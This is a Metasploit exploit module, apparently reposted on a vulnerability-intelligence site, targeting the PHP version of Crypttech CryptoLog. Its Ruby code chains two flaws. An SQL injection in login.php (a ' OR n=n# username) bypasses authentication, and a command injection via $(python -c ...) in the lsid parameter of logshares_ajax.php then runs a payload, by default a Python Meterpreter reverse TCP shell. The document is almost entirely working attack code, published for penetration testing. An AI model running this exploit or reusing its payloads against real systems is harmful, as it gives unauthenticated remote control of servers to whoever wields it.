Crypttech CryptoLog SQL and Command Injection Vulnerability in PH
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Crypttech CryptoLog Remote Code Execution",
'Description' => %q{
This module exploits a SQL injection and command injection vulnerability in the PHP version of CryptoLog.
An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities
are no longer present in the ASP.NET version CryptoLog, available since 2009.
CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is
used by the application without input validation and parameter binding, which leads to SQL injection
vulnerability. Successfully exploiting this vulnerability gives a valid session.
CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not
possible to access this endpoint without having a valid session. One user parameter is used by the
application while executing an operating system command, which causes a command injection issue.
Combining these vulnerabilities gives the opportunity execute operation system commands under the context
of the web user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <[email protected]>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => '2017-05-03',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
]
)
end
def bypass_login
r = rand_text_alpha(15)
i = rand_text_numeric(5)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
'vars_get' => {
'act' => 'login'
},
'vars_post' => {
'user' => "' OR #{i}=#{i}#",
'pass' => "#{r}"
}
})
if res && res.code == 302 && res.headers.include?('Set-Cookie')
res.get_cookies
else
nil
end
end
def check
if bypass_login.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
print_status("Bypassing login by exploiting SQLi flaw")
cookie = bypass_login
if cookie.nil?
fail_with(Failure::Unknown, "Something went wrong.")
end
print_good("Successfully logged in")
print_status("Exploiting command injection flaw")
r = rand_text_alpha(15)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
'cookie' => cookie,
'vars_post' => {
'opt' => "check",
'lsid' => "$(python -c \"#{payload.encoded}\")",
'lssharetype' => "#{r}"
}
})
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo